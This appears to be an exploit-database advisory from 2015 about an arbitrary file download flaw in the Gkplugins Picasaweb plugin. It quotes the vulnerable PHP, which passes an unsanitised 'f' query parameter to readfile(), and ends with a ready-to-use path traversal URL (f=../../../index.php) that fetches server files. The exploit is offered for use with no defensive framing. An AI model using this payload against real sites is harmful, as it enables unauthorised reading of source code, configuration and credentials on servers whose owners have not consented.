29 lines
No EOL
796 B
Text
29 lines
No EOL
796 B
Text
# Exploit Title: Gkplugins Picasaweb Download File
|
|
# Date : 2015-08-13
|
|
# Exploit Author : TMT [VNhgroup]
|
|
# Vendor Homepage: https://gkplugins.com/
|
|
# Tested on: Windows 7
|
|
|
|
File
|
|
------------------------
|
|
$fileout = $_GET['f']; <-- can you download file
|
|
$filelength = $_GET['l'];
|
|
$filestream = $_GET['start'];
|
|
if($fileout!=""){
|
|
$fileout = urldecode($fileout);
|
|
$filelength = urldecode($filelength);
|
|
if($filestream!=""){
|
|
$filelength -= $filestream;
|
|
$filestream = "?start=".$filestream;
|
|
}
|
|
header('Content-Type: application/octet-stream');
|
|
header('Content-Length: ' . $filelength);
|
|
readfile($fileout.$filestream);
|
|
}else{
|
|
$text = get_curl($link);
|
|
echo $text;
|
|
}
|
|
|
|
------------------------------
|
|
Exploit Code:
|
|
site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php |